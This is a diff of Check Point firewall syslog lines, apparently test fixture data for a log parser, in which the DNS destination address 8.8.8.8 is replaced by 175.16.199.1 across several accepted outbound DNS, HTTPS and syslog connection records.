+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57648"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55401"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52674"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46558"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37937"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46558"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37937"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38710"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45107"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37101"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45107"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37101"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58828"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38082"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e051,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:52:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e051,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504337"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55344"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504338"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37064"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504338"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60561"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e051,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504337"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55344"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504338"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37064"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504338"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60561"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36894"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e054,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47813"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40621"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
